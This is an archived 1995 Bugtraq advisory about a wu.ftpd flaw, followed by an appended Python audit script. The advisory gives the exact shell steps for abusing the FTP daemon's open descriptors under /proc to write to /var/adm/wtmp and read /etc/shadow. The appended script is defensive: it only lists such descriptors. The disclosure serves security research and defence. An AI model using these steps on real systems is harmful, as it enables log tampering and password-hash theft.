Bugtraq mailing list archives
Security Problem ftpd (includes wu.ftpd 2.4 and 2.4.2 beta 4)
From: H.Karrenbeld () ct utwente nl (Henri Karrenbeld)
Date: Wed, 12 Jul 1995 13:34:10 +0100
Description:
People with local ftp access can use the filedescriptors in /proc of
the (wu.)ftpd process (which is running under their euid) to read and append
to files to which they should not have access. This gives write permission
to /var/adm/wtmp and read access to /etc/shadow, if your ftpd is hacked
in a 'dirty' way to incorporate shadow passwords. The 2.4 version also
gave write access to /var/adm/xferlog. A friend of mine reported write
access to /etc/ftpconversions (with possible root vulnerabilities), but
I have not been able to repeat that (2.4.2 beta 4 appears to be safe in
this)
How to show your sysadmin it works (test done with 2.4.2 beta):
$ ftp -n localhost
user: <yourname>
password: <yourpassword>
ftp> <ctrl-Z>
Now find the process id of the wu.ftpd running:
$ ps -alxw |grep <yourname>
0 502 2728 46 1 0 527 396 1416fc S ? 0:00 -loopback: <yourname>
       ^
       +---- this is the one!
$ cd /proc/2728/fd
$ ls -lG
total 0
lrwx------ 1 <yourname> 64 Jul 12 13:07 0 -> [0000]:0
lrwx------ 1 <yourname> 64 Jul 12 13:07 1 -> [0000]:0
l-wx------ 1 <yourname> 64 Jul 12 13:07 2 -> [0301]:4141
lrwx------ 1 <yourname> 64 Jul 12 13:07 3 -> [0000]:0
-r-x------ 1 <yourname> 64 Jul 12 13:07 4 -> [0301]:92276
l-wx------ 1 <yourname> 64 Jul 12 13:07 5 -> [0301]:24718
$ ls -il /var/adm/wtmp
24718 -rw-r--r-- 1 root root 183911 Jul 12 13:04 /var/adm/wtmp
So normal access for wtmp is 644, however this 'hard link' into the filesystem
points directly to the inode (24718) and gives you write access to this file
by writing to /proc/2728/fd/5 instead of to /var/adm/wtmp.
If your wu.ftpd has implemented shadow password in a 'dirty' way, there is
also a filedescriptor for /etc/shadow (only this is lr-x, but it still
defeats the entire idea of having a shadow password file).
Other versions of wu.ftpd or other setups might have more or other fd's
opened ( /etc/ftpusers, /etc/ftpaccess, etc. etc.) but those have not
shown write access on all systems I checked (wu.ftpd 2.4 and 2.4.2 beta,
with linux kernels 1.2.1, 1.2.3, 1.2.8 and 1.2.9).
How to fix?
I'm afraid I don't have enough skills myself to fix this myself, obviously
it involves opening and closing the /var/adm/wtmp after it has been written
to, so the filedescriptor will not be in the /proc filesystem anymore,
however there might be a possible race condition here (actually you could
consider this also a race condition, only a very slow one ;-). While this
is a feasible solution for the use of /var/adm/wtmp, which is only accessed
at login or logoff from ftp, it is not one for /var/adm/xferlog, however
upgrading to 2.4.2 beta 4 (or above) will probably solve the problem for
illegal access to this file.
Other programs?
Well, all the Linux machines I have access to use wu.ftpd, however you
should not be surprised if this trick also works with ftpd of other
origin. Your mileage may vary.
$) Henri
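
Added example, not part of the original post: a read-only audit an administrator could run as root to list regular-file descriptors that a process holds with more access than its effective uid would get from the file's permission bits, which is the condition the post describes for wtmp and shadow. It assumes a procfs that provides `status` and `fdinfo` entries, as current Linux kernels do; the function names are hypothetical, and ACLs and capabilities are ignored.

```python
import os
import stat

def _status_ids(proc, pid):
    """Return (effective uid, group ids) parsed from <proc>/<pid>/status."""
    euid, gids = None, set()
    with open(os.path.join(proc, str(pid), "status")) as f:
        for line in f:
            key, _, val = line.partition(":")
            if key == "Uid":
                euid = int(val.split()[1])   # real, effective, saved, fs
            elif key == "Gid":
                gids.add(int(val.split()[1]))
            elif key == "Groups":
                gids.update(int(g) for g in val.split())
    return euid, gids

def _perm_bits(st, uid, gids):
    """rwx bits the owner/group/other mode check would grant this uid."""
    if st.st_uid == uid:
        return (st.st_mode >> 6) & 7
    if st.st_gid in gids:
        return (st.st_mode >> 3) & 7
    return st.st_mode & 7

def audit_pid(pid, proc="/proc"):
    """Return [(fd, path, excess)] for regular files held beyond the euid's rights."""
    euid, gids = _status_ids(proc, pid)
    findings = []
    if euid == 0:
        return findings                      # root could open the file anyway
    base = os.path.join(proc, str(pid))
    for fd in sorted(os.listdir(os.path.join(base, "fd")), key=int):
        link = os.path.join(base, "fd", fd)
        try:
            st = os.stat(link)               # follows the link to the open inode
            with open(os.path.join(base, "fdinfo", fd)) as f:
                flags = next(int(l.split()[1], 8) for l in f if l.startswith("flags:"))
            path = os.readlink(link)
        except (OSError, StopIteration):
            continue                         # descriptor closed meanwhile or unreadable
        if not stat.S_ISREG(st.st_mode):
            continue                         # sockets, pipes and ttys are out of scope
        held = {os.O_RDONLY: 4, os.O_WRONLY: 2, os.O_RDWR: 6}.get(flags & os.O_ACCMODE, 0)
        excess = held & ~_perm_bits(st, euid, gids)
        if excess:
            findings.append((int(fd), path, ("r" if excess & 4 else "") + ("w" if excess & 2 else "")))
    return findings
```

A daemon that closes privileged files (or opens them only around each write) before switching to the user's euid produces an empty list here.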
